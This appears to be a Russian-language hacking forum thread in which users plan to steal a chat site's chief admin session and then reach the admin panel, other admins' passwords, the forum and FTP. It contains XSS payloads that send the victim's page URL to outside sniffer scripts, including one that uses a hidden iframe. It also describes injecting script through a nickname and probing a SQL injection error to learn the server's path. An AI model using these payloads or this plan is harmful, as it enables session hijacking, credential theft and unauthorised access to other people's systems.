Андрюш, я вообще-то от идеи использовать куки сразу отказалс, т.к. в куки передается только номер комнаты, номер цвета и название ника, вот потому я использовал следующий код <html> <head> </head> <body> <tr><td> <img src="http://chat/photos/26.big.jpg"> <script src="http://antichat.ru/cgi-bin/s.jpg?zz_"+document.location.href> </script> </td></tr> </body> </html> НО... как я говорил, в Реферере передается ссылка на картинку, а не адресная строка того, кто кликнул по этой ссылке, вот в чем загвоздка... А получив сессию Верховного Админа чата можно и в Админку залезть и посмотреть Логины и Пароли всех остальных админов, а также получить доступ к Форуму и ФТП (это особо интересно), т.к. я не думаю, что у "этого" админа разные пароли на Чат, Форум и ФТП ))))) Насколько я вычитал в доках по ЯваСкриптам и ВБСкриптам, то различают Серверные скрипты и клиентские, т.е. все же с помощью ЯваСкрипта можно получить доступ к файлам на серевере, только вот что это за Серверные скрипты и какое условие должно выполняться, чтобы сервер воспринял скрипт как серверный....?
И вот еще что... почему я спрашивал по поводу <script>alert('as');</script>- тут интереснее database error: cannot search user You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'as');%'' at line 1 Чтобы была возможность узнать полный путь на сервере к чату.... Вопрос собствено к пр0х0жему - каким образом и каким кодом ему удалось вызвать синтаксическую ошибку?
Игорёк объясняю тебе!!! вообщем забей на это снифер!!! пользуйся моим изобретением... вообщем такого я понял что ты имеешь ввиду ... вот исход файла </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> <script> var smr = "http://seechat.fatal.ru/friker/frika.php?" + location.href; document.write("<iframe src="+smr+" width=0 heigth=0></iframe>") </script> [/QUOTE]<span id='postcolor'> Как видишь мы получаем локатион окна к которому обратился юзер... вот почему у тебя в рефере и пишет путь к картинке ... Понял ? нет? вот! вспомни как нащёт старого чата я делал... я посылал ник со скриптом в сам чат... но там ишла ещё + картинка которая не показывалась и при входе в чат админ видел наш ник и отсылались к нам окно администтратора там ГДЕ скрипт наш.. тоесть окно фрэйма look понял??? значит это нам ничего не даст, нащёт этого даже можешь не пробовать... потому что при откытии это окна к нам отошлётса его рефер с нащей же картинко... нужно скрипт это заливать в чат сам... вот! но идея совсем другая... нужно вообщем через этот скрипт обратитса к окну его, но трабла в чём, в том что может у него быть 5 а может и 10 окон открыто... тоеть нужно юзать через TITLE чтоб TITLE ID окна был = "Нашему чату"
